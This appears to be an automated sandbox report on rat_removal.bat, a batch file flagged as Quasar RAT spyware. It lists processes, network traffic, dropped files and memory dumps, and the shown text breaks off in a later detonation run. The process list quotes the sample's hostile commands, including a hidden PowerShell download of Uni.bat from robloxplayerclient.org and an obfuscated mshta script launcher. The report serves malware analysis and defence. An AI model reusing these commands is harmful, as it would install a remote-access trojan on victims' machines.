Malware Analysis Report

2025-06-16 05:31

Sample ID 240314-f3wxmsdg73
Target rat_removal.bat
SHA256 7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e
Tags
quasar spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e

Threat Level: Known bad

The file rat_removal.bat was found to be: Known bad.

Malicious Activity Summary

quasar spyware trojan

Quasar RAT

Quasar payload

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-14 05:24

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-14 05:24

Reported

2024-03-14 05:27

Platform

win10v2004-20240226-en

Max time kernel

49s

Max time network

37s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4104 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4104 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4104 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1280 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 436 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 3484 wrote to memory of 436 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 436 wrote to memory of 3516 N/A C:\Windows\$sxr-cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 3516 N/A C:\Windows\$sxr-cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 1432 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 436 wrote to memory of 1432 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 1432 wrote to memory of 680 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\lsass.exe
PID 1432 wrote to memory of 680 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\lsass.exe
PID 1432 wrote to memory of 968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 432 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 432 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1084 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1084 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1092 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1092 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1100 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1100 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1208 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1208 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1272 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1272 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1328 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1328 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1396 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1396 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1504 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1504 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1596 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1596 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:YukCfVmozO; "

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 robloxplayerclient.org udp
US 104.21.7.174:443 robloxplayerclient.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 174.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

memory/1812-5-0x0000021592E60000-0x0000021592E82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adp4imuo.w3c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1812-14-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/1812-15-0x00000215AB2D0000-0x00000215AB2E0000-memory.dmp

memory/1812-16-0x00000215AB2D0000-0x00000215AB2E0000-memory.dmp

memory/1812-20-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 7a98c3b9846bfac750cb9ecb4c92e06e
SHA1 547f1300c41c50658c7ef4530de478992d6b4f5e
SHA256 63422f3ad2d7ede071a78fe768d32af2143d384ad469be3ce4495450e99518c3
SHA512 61394ba7135a42c8a7c224cc09811a6e29ec9e84ceaeaea6352021ccea251e93f96983b44cd8072d36915d3b2c52316804dd2e609afa108619fdf2139bd2e0ac

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4504-23-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-24-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-25-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-35-0x00000166C71F0000-0x00000166C7234000-memory.dmp

memory/4504-36-0x00000166C7240000-0x00000166C72B6000-memory.dmp

memory/4504-37-0x0000016690000000-0x0000016690AAC000-memory.dmp

memory/4504-38-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-39-0x0000016690AB0000-0x000001669159C000-memory.dmp

memory/4504-40-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-41-0x00007FFCE3FD0000-0x00007FFCE408E000-memory.dmp

memory/4504-42-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-43-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-44-0x00000166FFBB0000-0x00000166FFCAC000-memory.dmp

memory/4504-45-0x00000166C6E10000-0x00000166C6E32000-memory.dmp

memory/4504-46-0x00000166C6E30000-0x00000166C6E36000-memory.dmp

memory/4504-47-0x00000166C6E40000-0x00000166C6E9E000-memory.dmp

memory/4504-48-0x00000166DF490000-0x00000166DF4E8000-memory.dmp

memory/4504-49-0x00000166AE8C0000-0x00000166AE8C6000-memory.dmp

memory/4504-50-0x00000166CF380000-0x00000166CF388000-memory.dmp

memory/4504-51-0x00000166915A0000-0x00000166915A6000-memory.dmp

memory/4504-52-0x00000166915B0000-0x00000166915EE000-memory.dmp

memory/4504-53-0x0000016691640000-0x000001669226C000-memory.dmp

memory/4504-54-0x0000016692270000-0x0000016692322000-memory.dmp

memory/4504-55-0x0000016692320000-0x0000016692356000-memory.dmp

memory/4504-56-0x0000016692360000-0x00000166923B8000-memory.dmp

memory/4504-57-0x00000166923C0000-0x00000166923EE000-memory.dmp

memory/4504-58-0x00007FF74DA30000-0x00007FF74DAA1000-memory.dmp

memory/4504-59-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-61-0x00000166915F0000-0x00000166915F8000-memory.dmp

memory/4504-62-0x0000000180000000-0x0000000180007000-memory.dmp

memory/4504-65-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-66-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-71-0x00007FFCC7558000-0x00007FFCC7559000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

C:\Windows\$sxr-cmd.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Windows\$sxr-powershell.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/1432-81-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/1432-83-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/1432-82-0x0000027768F30000-0x0000027768F40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/4504-96-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-97-0x00000277797E0000-0x0000027779E86000-memory.dmp

memory/4504-98-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-99-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-100-0x0000027779E90000-0x000002777A578000-memory.dmp

memory/1432-101-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-102-0x00007FFCE3FD0000-0x00007FFCE408E000-memory.dmp

memory/1432-103-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-104-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-105-0x0000027750BE0000-0x0000027750C02000-memory.dmp

memory/1432-106-0x0000027750CD0000-0x0000027750CD6000-memory.dmp

memory/1432-107-0x0000027750D20000-0x0000027750D26000-memory.dmp

memory/1432-108-0x000002777A980000-0x000002777AECE000-memory.dmp

memory/1432-109-0x000002777AED0000-0x000002777B67E000-memory.dmp

memory/1432-110-0x000002777B680000-0x000002777BA0C000-memory.dmp

memory/1432-111-0x000002777BA10000-0x000002777BAC2000-memory.dmp

memory/4504-113-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-114-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-115-0x000002777BB00000-0x000002777BB6A000-memory.dmp

memory/1432-116-0x000002777BB70000-0x000002777BBB2000-memory.dmp

memory/1432-117-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/1432-121-0x0000000180000000-0x0000000180007000-memory.dmp

memory/680-124-0x000001C0EA3B0000-0x000001C0EA3D3000-memory.dmp

memory/680-125-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-126-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-134-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/680-136-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-135-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-139-0x00007FFCE5F4D000-0x00007FFCE5F4E000-memory.dmp

memory/968-141-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/1432-149-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/968-151-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/1432-153-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/968-152-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/968-155-0x00007FFCE5F4C000-0x00007FFCE5F4D000-memory.dmp

memory/968-154-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/432-159-0x000001A828260000-0x000001A828289000-memory.dmp

memory/1432-160-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/432-169-0x000001A828260000-0x000001A828289000-memory.dmp

memory/432-168-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/432-170-0x000001A828260000-0x000001A828289000-memory.dmp

memory/528-174-0x00000220445D0000-0x00000220445F9000-memory.dmp

memory/1432-179-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-185-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-14 05:24

Reported

2024-03-14 05:27

Platform

win11-20240214-en

Max time kernel

43s

Max time network

23s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3252 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3252 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
